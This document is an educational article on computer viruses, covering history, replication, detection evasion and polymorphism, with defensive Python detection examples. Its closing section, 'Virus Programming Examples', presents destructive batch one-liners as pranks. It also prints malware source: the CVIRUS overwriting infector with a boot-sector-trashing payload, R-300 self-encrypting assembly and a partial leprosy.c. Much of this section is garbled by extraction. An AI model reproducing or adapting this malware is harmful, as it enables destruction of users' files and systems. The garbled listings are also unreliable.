The word virus is derived from, and used in the same sense as, its biological equivalent. In common parlance "virus" is often used for all kinds of malware (malicious software), including those more properly classified as worms or Trojans; most popular anti-virus packages defend against all of these. In some technical communities the term is also extended, insultingly, to the authors of malware. The English plural of "virus" is "viruses"; "virii" and "viri" are sometimes seen, but they are rare and not standard. The term "virus" was first used in an academic publication by Fred Cohen in his 1984 paper Experiments with Computer Viruses, where he credits Len Adleman with coining it. However, a 1972 science fiction novel by David Gerrold, When H.A.R.L.I.E. Was One, describes a fictional computer program called "VIRUS" that worked just like a virus (and was countered by a program called "VACCINE"), and "computer virus" in its current sense also appears in the comic book Uncanny X-Men #158, written by Chris Claremont and published in 1982. So although Cohen's may have been the first academic use, the term had been used earlier.

History
A program called "Elk Cloner" is credited with being the first computer virus to appear "in the wild", that is, outside the single computer or lab where it was created. Written in 1982 by Rich Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. The virus was originally a joke, created by the high-school student and attached to a game: the game played normally, but on the 50th start it showed a blank screen with a poem about Elk Cloner instead, and the computer was then infected. The first PC virus was a boot sector virus called (c)Brain, created in 1986 by two brothers, Basit and Amjad Farooq Alvi, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, may have predated it, based on code within the virus.

Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would run when the user booted the computer from the disk. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resulting increase in BBS and modem use and software sharing. Bulletin-board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBSs. Within the "pirate scene" of hobbyists trading illicit copies of commercial software, traders in a hurry to obtain the latest applications and games were easy targets for viruses.

Since the mid-1990s, macro viruses have become common. Most are written in the scripting languages for Microsoft programs such as Word and Excel, and spread within Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most of these viruses could spread on Macintosh computers as well. Most of them could not send infected e-mail; those that did spread through e-mail took advantage of the Microsoft Outlook COM interface.

Macro viruses pose unique problems for detection software. For example, some versions of Microsoft Word allowed macros to replicate themselves with additional blank lines; the virus behaved identically but would be misidentified as a new virus. In another example, if two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus distinct from its "parents". A computer virus may also be transmitted through instant messaging: a virus may send a web link as an instant message to all the contacts on an infected machine, and if a recipient, thinking the link comes from a friend (a trusted source), follows it, the malware hosted at the site may infect the new computer and continue propagating. The newest species of the virus family is the cross-site scripting virus, which emerged from research and was academically demonstrated in 2005. It uses cross-site scripting vulnerabilities to propagate. Since 2005 there have been several instances of cross-site scripting viruses in the wild; the most notable sites affected have been MySpace and Yahoo.

Why do people write and spread viruses?


It is difficult to know why people write them; everyone has their own reasons. Some general reasons are to experiment with writing viruses or to test their programming talent. Some just like to see how far the virus spreads and how famous it becomes around the world. The following list, drawn from postings to the newsgroup alt.comp.virus, tries to explain why people write and spread viruses:

They don't understand, or prefer not to think about, the consequences for other people
They simply don't care
They don't consider it their problem if someone else is inconvenienced
They draw a false distinction between creating/publishing viruses and distributing them
They consider it someone else's responsibility to protect systems from their creations
They get a buzz, acknowledged or otherwise, from vandalism
They consider they're fighting authority
They like 'matching wits' with anti-virus vendors
It's a way of getting attention, getting recognition from their peers and their names (or at least that of their virus) in the papers and the WildList
They're keeping the anti-virus vendors in a job

Replication strategies
In order to replicate, a virus must be permitted to execute code and write to memory. For this reason many viruses attach themselves to executable files that may be part of legitimate programs; if a user starts an infected program, the virus code may be executed first. Viruses can be divided into two types on the basis of their behaviour when executed. Nonresident viruses immediately search for other hosts that can be infected, infect them, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started; instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or by the operating system itself.

Nonresident viruses
Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder encounters, it calls the replication module to infect that file. For a simple virus the replicator's tasks are to:

1. Open the new file
2. Check whether the executable has already been infected (if so, return to the finder module)
3. Append the virus code to the executable file
4. Save the executable's starting point
5. Change the executable's starting point so that it points to the start of the newly copied virus code
6. Save the old start location in the virus in such a way that the virus branches to that location right after its own execution
7. Save the changes to the executable file
8. Close the infected file
9. Return to the finder so that it can find new files for the replicator to infect

Resident viruses
Resident viruses contain a replication module similar to the one employed by nonresident viruses. However, this module is not called by a finder module. Instead, the virus loads the replication module into memory when it is executed and ensures that the module runs each time the operating system is asked to perform a certain operation. For example, the replication module can be called each time the operating system executes a file, in which case the virus infects every suitable program that is executed on the computer. Resident viruses are sometimes subdivided into fast infectors and slow infectors. Fast infectors are designed to infect as many files as possible; for instance, a fast infector may infect every potential host file that is accessed. This poses a special problem for anti-virus software, since a virus scanner accesses every potential host file on the computer when it performs a system-wide scan: if the scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the scanner and infect every file that is scanned. Fast infectors rely on their high infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow the computer down or perform many suspicious actions that anti-virus software can notice. Slow infectors, on the other hand, are designed to infect hosts infrequently; for instance, some only infect files when they are copied. Slow infectors avoid detection by limiting their actions: they are less likely to slow the computer noticeably, and will only rarely trigger anti-virus software that watches for suspicious program behaviour. The slow-infector approach does not seem to have been very successful, however.
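The replicator steps listed above (append the virus code, save the host's starting point, repoint the entry point at the appended code) leave a fingerprint in the file header that does not depend on any virus signature. As an added example, not code from the page, here is a Python check for Windows PE files that parses the entry point and the section table and flags an entry point that lies outside every section, sits in a section that is not executable or is writable, or sits in the last section, which is where appended code normally ends up. The PE images it tests against are built in memory from a constructed layout (hypothetical section names, no real binary). Packed or self-modifying legitimate programs trip the same heuristics, so treat a finding as a lead, not a verdict.

```python
import struct

# Section characteristic flags from the PE/COFF specification
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Read the fields an appender check needs: AddressOfEntryPoint and the
    section table. Raises ValueError for anything that is not a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    nsections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    entry, = struct.unpack_from("<I", data, opt + 16)   # AddressOfEntryPoint (RVA)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * 40
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw_ptr": raw_ptr,
                         "raw_size": raw_size, "chars": chars})
    return {"entry": entry, "sections": sections}


def infection_indicators(pe):
    """Heuristics that follow from the replicator steps: appended code lands
    in (or after) the last section and the patched entry point must reach it.
    Returns a list of readable findings; an empty list means nothing odd."""
    findings = []
    entry, sections = pe["entry"], pe["sections"]
    holder = None
    for s in sections:
        if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"]):
            holder = s
            break
    if holder is None:
        findings.append("entry point 0x%x lies outside every section" % entry)
        return findings
    if not holder["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section %s is not executable" % holder["name"])
    if holder["chars"] & IMAGE_SCN_MEM_WRITE:
        findings.append("entry section %s is writable" % holder["name"])
    if len(sections) > 1 and holder is sections[-1]:
        findings.append("entry point is in the last section (%s), as with appended code" % holder["name"])
    return findings


def build_pe(layout, entry_rva):
    """Assemble a minimal, non-runnable PE32 image in memory for testing.
    layout: list of (name, rva, size, characteristics). Constructed data only."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    opt_size = 224                                         # standard PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    headers_len = 64 + 4 + 20 + opt_size + 40 * len(layout)
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF               # file alignment 0x200
    table, bodies = bytearray(), bytearray()
    for name, rva, size, chars in layout:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), size, rva, size,
                             raw_ptr, 0, 0, 0, 0, chars)
        bodies += bytes(size)
        raw_ptr += size
    image = dos + b"PE\0\0" + coff + opt + table
    image += bytes(((headers_len + 0x1FF) & ~0x1FF) - headers_len)
    return bytes(image + bodies)


# A plain two-section layout, and the same file after an appender added a
# third, executable-and-writable section and pointed the entry point at it.
CLEAN_LAYOUT = [
    (".text", 0x1000, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", 0x2000, 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]
INFECTED_LAYOUT = CLEAN_LAYOUT + [
    (".vir", 0x3000, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]

if __name__ == "__main__":
    for label, layout, ep in (("clean", CLEAN_LAYOUT, 0x1000), ("infected", INFECTED_LAYOUT, 0x3000)):
        print(label, infection_indicators(parse_pe(build_pe(layout, ep))) or ["no findings"])
```

Run it against a directory of real executables by reading each file's bytes into `parse_pe`; the section-name check is deliberately absent, since an infector can call its section anything it likes, and it is the entry-point geometry, not the name, that the replicator cannot avoid changing.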

Host types
Viruses have targeted various types of hosts. This is a non-exhaustive list:

Binary executable files (such as COM and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux)
Volume boot records of floppy disks and hard disk partitions
The master boot record (MBR) of a hard disk
General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell scripts on Unix-like platforms)
Application-specific script files (such as Telix scripts)
Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)

Methods to avoid detection


In order to avoid detection by users, some viruses employ various kinds of deception. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected. This does not fool anti-virus software, however. Some viruses can infect files without increasing their size or damaging them; they do so by overwriting unused areas of executable files, and are called cavity viruses. For example the CIH virus, or Chernobyl virus, infects Portable Executable files; because those files contained many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file. Some viruses try to avoid detection by killing the tasks associated with anti-virus software before it can detect them. As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced.

Avoiding bait files and other undesirable hosts


A virus needs to infect hosts in order to spread further. In some cases it is a bad idea to infect a particular host program. For example, many anti-virus programs perform an integrity check of their own code, so infecting them increases the likelihood that the virus is detected; for this reason some viruses are programmed not to infect programs known to be part of anti-virus software. Another type of host that viruses sometimes avoid is bait files. Bait files (or goat files) are files specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. They are created for various reasons, all related to detecting the virus:

Anti-virus professionals use bait files to take a sample of a virus (i.e. a copy of a program file infected by it). It is more practical to store and exchange a small infected bait file than a large infected application.
Anti-virus professionals use bait files to study the behaviour of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic: the virus can be made to infect a large number of bait files, and the infected files used to test whether a scanner detects all versions of it.
Some anti-virus software employs bait files that are accessed regularly; when these files are modified, the software warns the user that a virus is probably active on the system.

Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as very small program files or programs that contain certain patterns of 'garbage instructions'. A related strategy that makes baiting difficult is sparse infection: sometimes a sparse infector does not infect a host file that would be a suitable candidate in other circumstances. For example, a virus can decide at random whether to infect a file, or it can infect host files only on particular days of the week.
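As an added example (not from the page), the following Python implements the third use of bait files described above, a goat-file monitor, and also classifies what kind of infector touched a file: a size increase points at an appender, while an unchanged size with a changed hash is what a cavity infector such as the CIH mentioned earlier leaves behind. The goat files, and the tampering that stands in for an infection, are constructed; no real virus is involved. Note the page's own caveat: these goats are small and filled with a uniform byte, exactly the "suspicious program" profile a bait-aware or sparse infector skips, so in practice goats should look like ordinary executables.

```python
import hashlib
import os
import tempfile

FILLER = b"\x90"            # uniform filler; deliberately dull goat content (constructed)


def plant_bait(directory, count=3, size=1024):
    """Create small goat files and record size + SHA-256 of each.
    Returns the manifest the monitor checks against later."""
    manifest = {}
    for i in range(count):
        path = os.path.join(directory, "goat%02d.com" % i)
        content = FILLER * size
        with open(path, "wb") as f:
            f.write(content)
        manifest[path] = (size, hashlib.sha256(content).hexdigest())
    return manifest


def check_bait(manifest):
    """Compare each goat against its recorded state and classify the change
    so the analyst knows what kind of infector to look for:
      grown       -> appending (or prepending) infector
      shrunk      -> truncated / overwritten with something smaller
      overwritten -> same size, different bytes: overwriting or cavity infector
      missing     -> file deleted"""
    findings = []
    for path, (size, digest) in sorted(manifest.items()):
        try:
            with open(path, "rb") as f:
                data = f.read()
        except OSError:
            findings.append((os.path.basename(path), "missing"))
            continue
        if len(data) > size:
            findings.append((os.path.basename(path), "grown"))
        elif len(data) < size:
            findings.append((os.path.basename(path), "shrunk"))
        elif hashlib.sha256(data).hexdigest() != digest:
            findings.append((os.path.basename(path), "overwritten"))
    return findings


def simulate_infections(manifest):
    """Constructed tampering standing in for two infector styles (no real
    virus): append bytes to the first goat (appender), patch bytes inside the
    second without changing its size (cavity), leave the third alone."""
    paths = sorted(manifest)
    with open(paths[0], "ab") as f:
        f.write(b"APPENDED-BODY")
    with open(paths[1], "r+b") as f:
        f.seek(16)
        f.write(b"CAVITY")


def demo():
    """Plant goats in a fresh temp directory, confirm they verify clean,
    simulate two infections and return what the monitor reports."""
    directory = tempfile.mkdtemp(prefix="goat_")
    manifest = plant_bait(directory)
    assert check_bait(manifest) == []          # freshly planted: nothing to report
    simulate_infections(manifest)
    return check_bait(manifest)


if __name__ == "__main__":
    for name, kind in demo():
        print(name, kind)
```

The size-first ordering in `check_bait` matters: hashing is the expensive step, and an appender is caught by the cheap length comparison alone, which is what lets a resident monitor re-check goats frequently.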

Stealth
Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by hooking the anti-virus software's request to read a file, so that the request is handled by the virus instead of the OS; the virus then returns an uninfected version of the file, so that it appears "clean". Modern anti-virus software employs various techniques to counter the stealth mechanisms of viruses. The only completely reliable way to defeat stealth is to boot from a medium known to be clean and scan from there.

Self-modification
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.

Simple self-modifications
In the past, some viruses modified themselves only in simple ways. For example, they regularly exchanged subroutines in their code for others that perform the same action (2+2 could be swapped for 1+3, say). This poses no problem to a reasonably advanced virus scanner.

Encryption with a variable key
A more advanced method is the use of simple encryption to encipher the virus. In this case the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part that remains constant is the decrypting module, which might for example be appended to the end of the host. A virus scanner then cannot detect the virus body directly with a signature, but it can still detect the decrypting module, which makes indirect detection possible. Mostly the encryption these viruses employ is simple: each byte is XORed with a random key chosen and stored by the parent virus. XOR has the additional advantage that the encryption and decryption routines are the same (a XOR b = c, and c XOR b = a).

Polymorphic code
Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like a regular encrypted virus, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In a polymorphic virus, however, the decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts that stay the same from one infection to the next, making it impossible to detect directly with signatures. Anti-virus software can detect it by decrypting the virus in an emulator, or by statistical pattern analysis of the encrypted virus body. To produce polymorphic code, the virus needs a polymorphic engine (also called a mutating or mutation engine) somewhere in its encrypted body. Some viruses use polymorphic code in a way that significantly constrains the mutation rate. For example, a virus can be programmed to mutate only slightly over time, or to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of such slow polymorphic code is that it makes it harder for anti-virus professionals to obtain representative samples, because bait files infected in one run will typically contain identical or similar copies of the virus. This makes it more likely that detection by the virus scanner will be unreliable, and that some instances of the virus will avoid detection.
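As an added illustration of the encryption-with-variable-key scheme and of why polymorphism is the next step, here is a Python model (not code from the page): the "virus" is a constant decryptor stub, a per-file key byte, and an XOR-encrypted body. A plain byte-signature scan of the body fails on every infected sample, a signature on the stub still hits, and a scanner that first runs the decryptor, as an emulator does, finds the body signature again. The stub bytes, body text and signatures are constructed stand-ins, not real virus code. Once the stub itself varies per infection, as in the polymorphic case above, only the decrypt-then-scan path remains, which is the point the page makes.

```python
import random

# Constructed stand-ins: a fixed "decryptor" prefix and a body containing a
# recognisable phrase that a scanner would use as its signature.
DECRYPTOR_STUB = b"\xEB\x0A[xor-loop]"       # placeholder for the constant decryption routine
VIRUS_BODY = b"find hosts; append self; patch entry point; restore host"
BODY_SIGNATURE = b"append self"
STUB_SIGNATURE = b"[xor-loop]"


def xor_crypt(data, key):
    """Single-byte XOR; the same routine encrypts and decrypts (a^b=c, c^b=a)."""
    return bytes(b ^ key for b in data)


def make_sample(key=None, rng=random):
    """What one infected file carries: the constant stub, the key byte the
    parent chose for this infection, and the body encrypted under that key."""
    if key is None:
        key = rng.randrange(1, 256)           # key 0 would leave the body in clear
    return DECRYPTOR_STUB + bytes([key]) + xor_crypt(VIRUS_BODY, key)


def signature_scan(sample, signature):
    """Plain byte-pattern scanner: does the pattern occur anywhere in the file?"""
    return signature in sample


def emulate_and_scan(sample, signature):
    """Model of an emulating scanner: recognise the stub, perform the decryption
    it would perform at run time, then scan the recovered plaintext."""
    if not sample.startswith(DECRYPTOR_STUB):
        return False
    key = sample[len(DECRYPTOR_STUB)]
    plaintext = xor_crypt(sample[len(DECRYPTOR_STUB) + 1:], key)
    return signature in plaintext


def constant_region(samples):
    """Leading bytes identical across all samples: what a signature can still
    target once the body differs in every infected file."""
    prefix = 0
    while all(len(s) > prefix and s[prefix] == samples[0][prefix] for s in samples):
        prefix += 1
    return samples[0][:prefix]


if __name__ == "__main__":
    samples = [make_sample(k) for k in (0x21, 0x7E, 0xC3)]
    print("constant across infections:", constant_region(samples))
    for s in samples:
        print("body sig:", signature_scan(s, BODY_SIGNATURE),
              " stub sig:", signature_scan(s, STUB_SIGNATURE),
              " emulate+scan:", emulate_and_scan(s, BODY_SIGNATURE))
```

`constant_region` is the scanner writer's view: across three infections only the stub survives unchanged, so that is where the signature goes; a polymorphic engine attacks exactly that invariant.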

Metamorphic code
To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly language code, 90% of it part of the metamorphic engine.

Conclusions
There are lots of viruses in the world and new ones appear every day; new anti-virus programs and techniques are developed too. It is good to be aware of viruses and other malware, and it is cheaper to protect your environment from them than to be sorry afterwards. There might be a virus on your computer if it starts behaving differently, but there is no reason to panic when one is found. It pays to be a little suspicious of malware when you surf the Internet and download files: some files that look interesting may hide malware. A computer virus is a program that reproduces itself, and its mission is to spread. Most viruses are harmless, and some cause random damage to data files. A Trojan horse is not a virus because it does not reproduce; Trojan horses are usually disguised so that they look interesting, and there are Trojans that steal passwords and Trojans that format hard disks. Macro viruses spread from applications that use macros. They spread fast because people share so much data, e-mail documents and fetch documents over the Internet, and macros are very easy to write. Some people want to experiment with writing viruses and test their programming talent, while not understanding, or not caring about, the consequences for other people. A virus's mission is to hop from one program to another, and this can happen via floppy disks, Internet FTP sites, newsgroups and e-mail attachments. Viruses have mostly been written for PC computers and DOS environments. Viruses are no longer something that only programmers and computer specialists have to deal with; today everyday users have to deal with them.

Virus Programming Examples

1) A simple batch-file virus. Paste the following into Notepad and save it under any name with a .bat extension (for example fun.bat); without the .bat extension it will not run. It is a single line, written just for fun, and it deletes the whole Program Files tree if one exists:

=================cut below=============
@ECHO OFF
IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.*
===================end==================

(Note that the path contains a space, so under cmd.exe it would have to be quoted, and DELTREE only exists in MS-DOS 6 and Windows 9x.)

2) "Format" your friend's PC. Despite the name this does not format anything: it deletes the files in the root directory of C:, and /Y is not a DEL switch on MS-DOS (which only has /P to prompt) or on Windows cmd.exe (which uses /Q to suppress the prompt):

=================cut below=============
@ECHO OFF
DEL C:\*.* /Y
===================end==================

3) R-virus: the CVIRUS source, an MS-DOS overwriting virus written for Borland/Turbo C. The header names were lost in extraction and are restored here from the library calls the code makes (abswrite and __emit__ from dos.h, _open/_read/_creat/_write/_chmod/chsize/setftime from io.h and fcntl.h, struct ffblk from dir.h). The listing is incomplete and ends partway through spread().

#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#include <fcntl.h>
#include <dos.h>
#include <dir.h>

/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM
   file which CVIRUS can infect without increasing the size of the file.
   (Since this would tip off the victim to CVIRUS's presence, no file under
   this size will be infected.)  It should be set to the approximate size of
   the LZEXEd .EXE file produced from this code, but always a few bytes
   larger.  Why?  Because this way CVIRUS doesn't need to check itself for
   previous infection, saving time.  SIGNATURE is the four-byte signature
   that CVIRUS checks for to prevent re-infection of itself. */

#ifdef DEBUG
#define TOO_SMALL 6000
#else
#define TOO_SMALL 4735
#endif

#define SIGNATURE "NMAN"

/* The following is a table of random byte values.  Be sure to constantly
   change this to prevent detection by virus scanners, but keep it short (or
   non-existent) to keep the code size down. */

char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04";

void hostile_activity(void)
{
  /* Put whatever you feel like doing here...  I chose to make this routine
     trash the victim's boot, FAT, and directory sectors, but you can alter
     this code however you want, and are encouraged to do so. */

#ifdef DEBUG
  puts("\aAll files infected!");
  exit(1);
#else
  /* Overwrite five sectors, starting with sector 0, on C:, with the memory
     at location DS:0000 (random garbage). */
  abswrite(2, 5, 0, (void *) 0);
  __emit__(0xCD, 0x19);        /* Reboot computer */
#endif
}

int infected(char *fname)
{
  /* This function determines if fname is infected.  It reads four bytes
     28 bytes in from the start and checks them against the current header.
     1 is returned if the file is already infected, 0 if it isn't. */

  register int handle;
  char virus_signature[35];
  static char check[] = SIGNATURE;

  handle = _open(fname, O_RDONLY);
  _read(handle, virus_signature, sizeof(virus_signature));
  close(handle);

#ifdef DEBUG
  printf("Signature for %s: %.4s\n", fname, &virus_signature[28]);
#endif

  /* This next bit may look really stupid, but it actually saves about 100
     bytes. */
  return ((virus_signature[30] == check[2]) && (virus_signature[31] == check[3]));
}

void spread(char *virus, struct ffblk *victim)
{
  /* This function infects victim with virus.  First, the victim's
     attributes are set to 0.  Then the virus is copied into the victim's
     file name.  Its attributes, file date/time, and size are set to that of
     the victim's, preventing detection, and the files are closed. */

  register int virus_handle, victim_handle;
  unsigned virus_size;
  char virus_code[TOO_SMALL + 1], *victim_name;

  /* This is used enough to warrant saving it in a separate variable */
  victim_name = victim->ff_name;

#ifdef DEBUG
  printf("Infecting %s with %s...\n", victim_name, virus);
#endif

  /* Turn off all of the victim's attributes so it can be replaced */
  _chmod(victim_name, 1, 0);

#ifdef DEBUG
  puts("Ok so far...");
#endif

  /* Recreate the victim */
  virus_handle = _open(virus, O_RDONLY);
  victim_handle = _creat(victim_name, victim->ff_attrib);

  /* Copy virus */
  virus_size = _read(virus_handle, virus_code, sizeof(virus_code));
  _write(victim_handle, virus_code, virus_size);

#ifdef DEBUG
  puts("Almost done...");
#endif

  /* Reset victim's file date, time, and size */
  chsize(victim_handle, victim->ff_fsize);
  setftime(victim_handle, (struct ftime *) &victim->ff_ftime);

/* Close files */ close(virus_handle); close(victim_handle); #ifdef DEBUG 126

puts("Infection complete!"); #endif } struct ffblk *victim(void) { /* This function returns a pointer to the name of the virus's next victim. This routine is set up to try to infect .EXE and .COM files. If there is a command line argument, it will try to infect that file instead. If all files are infected, hostile activity is initiated... */ register char **ext; static char *types[] = {"*.EXE", "*.COM", NULL}; static struct ffblk ffblk; int done; for (ext = (*++_argv) ? _argv : types; *ext; ext++) { for (ext = (*++_argv) ? _argv : types; *ext; ext++) { done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH); while (!done) { #ifdef DEBUG printf("Scanning %s...\n", ffblk.ff_name); #endif /* If you want to check for specific days of the week, months, etc.... here is the place to insert the code (don't forget to "#include "). */ 127

if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name))) return(&ffblk); done = findnext(&ffblk); } } } /* If there are no files left to infect, have a little fun */ hostile_activity(); return(0); } int main(int argc, char *argv[]) { /* In the main program, a victim is found and infected. If all files are infected, a malicious action is performed. Otherwise, a bogus error message is displayed, and the virus terminates with code 1, simulating an error. */ char *err_msg[] = { "Out of memory", "Bad EXE format", "Invalid DOS version", "Bad memory block", "FCB creation error", "Sharing violation", "Abnormal program termination", "Divide error", }; char *virus_name; spread(argv[0], victim()); puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]); 128

return(1); }

4) R-300 virus

; ; ; ; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector. ; When an infected program is started, the virus will infect all files in the ; current directory and use the time counter for its encryption. It displays ; the text "T-1000" when it is ready infecting. Code Segment para 'code' R-1000 Virus

Assume Cs:Code,Ds:Code Length Equ Offset EndByte-Offset Main Org 100h Main: Mov Si,Offset Decrypt Mov Di,Si Mov Cl,Offset EndByte-Offset Decrypt On2: Lodsb Db 34h Crypt Db 0 Stosb Dec Cl Cmp Cl,0ffh Jne On2 Decrypt: 129

Mov Ah,4eh Push Ax Encr: Mov Ah,2ch Int 21h Mov Crypt,Dl Mov Si,Offset Decrypt Mov Di,Offset EndByte+10 Mov Cx,Offset EndByte-Offset Decrypt On3: Lodsb Xor Al,Crypt Stosb Dec Cx Cmp Cx,0ffffh Jne On3 Pop Ax On1: Xor Cx,Cx Mov Dx,Offset Nam Int 21h Jc Einde Mov Ax,3d01h Mov Dx,9eh Int 21h Mov Bx,Ax Mov Ah,40h Push Ax Mov Cx,Offset Decrypt-Offset Main Mov Dx,Offset Main Int 21h 130

Pop Ax Mov Cx,Offset EndByte-Offset Decrypt Mov Dx,Offset EndByte+10 Int 21h Mov Ah,3eh Int 21h Mov Ah,4fh Push Ax Jmp Short Encr Einde: Mov Ah,9 Mov Dx,Offset Msg Push Cs Pop Ds Int 21h Int 20h Msg Nam Db 'T-1000$' Db '*.Com',0

EndByte Db 0 Code Ends

End Main

; ; > and Remember Don't Forget to Call < ; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < ; 131


5) leprosy.c virus

#pragma inline #define CRLF "\x17\x14" /* CR/LF combo encrypted. */ /* No match in wildcard search. */

#define NO_MATCH 0x12

/* The following strings are not garbled; they are all encrypted */ /* using the simple technique of adding the integer value 10 to */ /* each character. They are automatically decrypted by */ /* 'print_s()', the function which sends the strings to 'stdout' */ /* using DOS service 09H. All are terminated with a dollar-sign */ /* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF \x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; 132 "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|

struct _dta { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13];

/* Disk Transfer Area format for find. */

} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; const int virus_size = 666; const int infection_rate = 4; char compare_buf[20]; int handle; int datestamp, timestamp; char diseased_count = 0; char success = 0;

/* Pad file length to 666 bytes. */ /* The size in bytes of the virus code. */ /* How many files to infect per run. */ /* Load program here to test infection. */

const char *codestart = (char *) 0x100; /* Memory where virus code begins. */

/* The current file handle being used. */ /* Store original date and time here. */ /* How many infected files found so far. */ /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI /* Standard C, for the support functions of this program. int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); 133 */

*/

void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void );

